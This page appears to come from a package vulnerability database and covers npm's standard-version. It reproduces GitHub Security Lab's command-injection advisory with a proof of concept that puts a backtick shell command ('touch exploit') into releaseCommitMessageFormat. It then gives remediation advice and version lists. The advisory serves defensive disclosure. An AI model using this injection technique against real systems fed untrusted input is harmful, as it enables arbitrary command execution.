NodeJS/standard-version/4.0.0-1

replacement for `npm version` with automatic CHANGELOG generation

https://www.npmjs.com/package/standard-version
ISC

1 Security Vulnerabilities

Command Injection in standard-version

Published date: 2020-07-13T21:34:59Z
Links:

GitHub Security Lab (GHSL) Vulnerability Report: GHSL-2020-111

The GitHub Security Lab team has identified a potential security vulnerability in standard-version.

Summary

The standardVersion function has a command injection vulnerability. Clients of the standard-version library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.

Product

Standard Version

Tested Version

Commit 2f04ac8

Details

Issue 1: Command injection in standardVersion

The following proof-of-concept illustrates the vulnerability. First install Standard Version and create an empty git repo to run the PoC in:

npm install standard-version
git init
echo "foo" > foo.txt # the git repo has to be non-empty
git add foo.txt
git commit -am "initial commit"

Now create a file with the following contents:

var fs = require("fs");
// setting up a bit of environment
fs.writeFileSync("package.json", '{"name": "foo", "version": "1.0.0"}');

const standardVersion = require('standard-version')

standardVersion({
  noVerify: true,
  infile: 'foo.txt',
  releaseCommitMessageFormat: "bla `touch exploit`"
})

and run it:

node test.js

Notice that a file named exploit has been created.

This vulnerability is similar to command injection vulnerabilities that have been found in other Javascript libraries. Here are some examples: CVE-2020-7646, CVE-2020-7614, CVE-2020-7597, CVE-2019-10778, CVE-2019-10776, CVE-2018-16462, CVE-2018-16461, CVE-2018-16460, CVE-2018-13797, CVE-2018-3786, CVE-2018-3772, CVE-2018-3746, CVE-2017-16100, CVE-2017-16042.

We have written a CodeQL query, which automatically detects this vulnerability. You can see the results of the query on the standard-version project here.

Impact

This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.

Remediation

We recommend not using an API that can interpret a string as a shell command. For example, use child_process.execFile instead of child_process.exec.

Credit

This issue was discovered and reported by GitHub Engineer @erik-krogh (Erik Krogh Kristensen).

Contact

You can contact the GHSL team at securitylab@github.com, please include GHSL-2020-111 in any communication regarding this issue.

Disclosure Policy

This report is subject to our coordinated disclosure policy.

Affected versions: ["1.1.0", "2.1.1", "2.1.2", "2.2.0", "2.2.1", "2.3.0", "2.3.1", "2.4.0", "3.0.0", "4.0.0-0", "4.0.0-1", "4.0.0", "4.1.0-candidate.0", "4.1.0-candidate.1", "4.1.0-candidate.2", "4.1.0", "4.2.0", "4.3.0-candidate.0", "4.3.0-candidate.1", "4.3.0", "4.4.0", "5.0.0-candidate.0", "5.0.0", "5.0.1", "5.0.2", "6.0.0-beta.0", "6.0.0", "6.0.1", "7.0.0", "7.0.1", "7.1.0", "8.0.0"]
Secure versions: [8.0.1, 8.0.2, 9.0.0, 9.1.0, 9.1.1, 9.2.0, 9.3.0, 9.3.1, 9.3.2, 9.5.0]
Recommendation: Update to version 9.5.0.

42 Other Versions

Version License Security Released
9.5.0 ISC 2022-05-15 - 13:46 almost 2 years
9.3.2 ISC 2021-10-17 - 20:48 over 2 years
9.3.1 ISC 2021-07-14 - 19:09 almost 3 years
9.3.0 ISC 2021-05-04 - 16:37 almost 3 years
9.2.0 ISC 2021-04-06 - 17:24 about 3 years
9.1.1 ISC 2021-02-17 - 21:47 about 3 years
9.1.0 ISC 2020-12-30 - 02:03 over 3 years
9.0.0 ISC 2020-08-15 - 00:27 over 3 years
8.0.2 ISC 2020-07-14 - 01:37 almost 4 years
8.0.1 ISC 2020-07-12 - 08:12 almost 4 years
8.0.0 ISC 1 2020-05-06 - 20:03 almost 4 years
7.1.0 ISC 1 2019-12-08 - 23:22 over 4 years
7.0.1 ISC 1 2019-11-07 - 22:04 over 4 years
7.0.0 ISC 1 2019-07-30 - 05:12 over 4 years
6.0.1 ISC 1 2019-05-05 - 21:55 almost 5 years
6.0.0 ISC 1 2019-05-05 - 21:26 almost 5 years
6.0.0-beta.0 ISC 1 2019-05-05 - 21:25 almost 5 years
5.0.2 ISC 1 2019-03-16 - 19:03 about 5 years
5.0.1 ISC 1 2019-02-28 - 04:11 about 5 years
5.0.0 ISC 1 2019-02-14 - 23:48 about 5 years
5.0.0-candidate.0 ISC 1 2018-11-02 - 06:55 over 5 years
4.4.0 ISC 1 2018-05-21 - 20:28 almost 6 years
4.3.0 ISC 1 2018-01-03 - 06:50 over 6 years
4.3.0-candidate.1 ISC 1 2018-01-03 - 05:27 over 6 years
4.3.0-candidate.0 ISC 1 2017-12-20 - 06:15 over 6 years
4.2.0 ISC 1 2017-06-12 - 22:34 almost 7 years
4.1.0 ISC 1 2017-06-06 - 05:14 almost 7 years
4.1.0-candidate.2 ISC 1 2017-06-06 - 00:12 almost 7 years
4.1.0-candidate.1 ISC 1 2017-06-05 - 23:31 almost 7 years
4.1.0-candidate.0 ISC 1 2017-06-05 - 00:05 almost 7 years
4.0.0 ISC 1 2016-12-02 - 11:34 over 7 years
4.0.0-1 ISC 1 2016-11-27 - 01:03 over 7 years
4.0.0-0 ISC 1 2016-11-26 - 22:26 over 7 years
3.0.0 ISC 1 2016-10-06 - 18:17 over 7 years
2.4.0 ISC 1 2016-07-13 - 17:36 almost 8 years
2.3.1 ISC 1 2016-06-15 - 23:04 almost 8 years
2.3.0 ISC 1 2016-06-02 - 17:24 almost 8 years
2.2.1 ISC 1 2016-05-02 - 04:26 almost 8 years
2.2.0 ISC 1 2016-05-02 - 00:01 almost 8 years
2.1.2 ISC 1 2016-04-11 - 02:20 about 8 years
2.1.1 ISC 1 2016-04-10 - 00:10 about 8 years
1.1.0 ISC 1 2016-04-08 - 23:29 about 8 years